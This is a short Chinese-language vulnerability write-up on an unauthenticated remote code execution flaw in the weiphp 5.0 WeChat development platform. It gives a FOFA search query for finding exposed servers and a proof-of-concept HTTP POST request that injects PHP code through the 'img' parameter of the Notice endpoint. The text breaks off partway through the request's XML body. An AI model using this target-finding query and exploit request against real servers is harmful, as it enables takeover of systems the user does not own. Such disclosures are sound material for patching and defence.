0x01 产品简介
weiphp 是一个开源,高效,简洁的微信开发平台,它是基于 oneThink 这个简单而强大的内容管理框架实现的。weiphp 的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频繁的工作交由 weiphp 来处理即可。
0x02 漏洞概述
weiphp5.0 存在远程代码执行漏洞,未授权的攻击者可以通过该漏洞进入远程代码执行,从而控制服务器。
0x03 测绘语句
fofa:body="/css/weiphp.css" && icon_hash="37052027"
0x04 漏洞复现
POST /public/index.php/weixin/Notice/index?img=echo+md5(1);exit(); HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
<xml>
<product_id>aaaa</product_id>
<appid